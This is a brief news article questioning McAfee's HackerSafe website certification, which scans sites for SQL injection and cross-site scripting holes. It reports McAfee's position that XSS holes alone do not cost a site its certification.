McAfee's HackerSafe certification called into question
McAfee's HackerSafe is a service that looks for vulnerabilities on websites using automated tools. If websites pass the test, they may bear the HackerSafe logo. Certification is intended to make customers trust the websites by increasing their faith in the protection of their data, for instance for payment transactions.
To receive the HackerSafe label, websites must, for instance, patch published vulnerabilities in the web applications used. According to a description of HackerSafe, the security service provider uses port scans and other methods to check server security; it also looks for SQL injection holes in Web applications and for vulnerabilities that allow for cross-site scripting. Certified websites are inspected daily. On the HackerSafe websites, the security provider also claims PCI compliance, which means that certified websites must comply with the Payment Card Industry Data Security Standard (PCI-DSS), which itself is somewhat controversial.
A spokesperson for McAfee total British media that the company does not find cross-site scripting holes to be as critical as SQL injection or other vulnerabilities. She said that at the moment the mere existence of an XSS hole would not be grounds for revocation of HackerSafe certification, though whenever McAfee finds XSS, the company informs its customers. She added that the XSS holes in question cannot be exploited to break into enterprise servers.
In the end, the HackerSafe certificate merely indicates that a company's servers are protected against known attacks. Certification does not, however, mean that customers of these websites are not in any danger of losing their data and – especially when it comes to the use of credit cards for payment transactions – their money to cyber-criminals.
* Still not Hacker safe, roll the video, Russ McRee's blog entry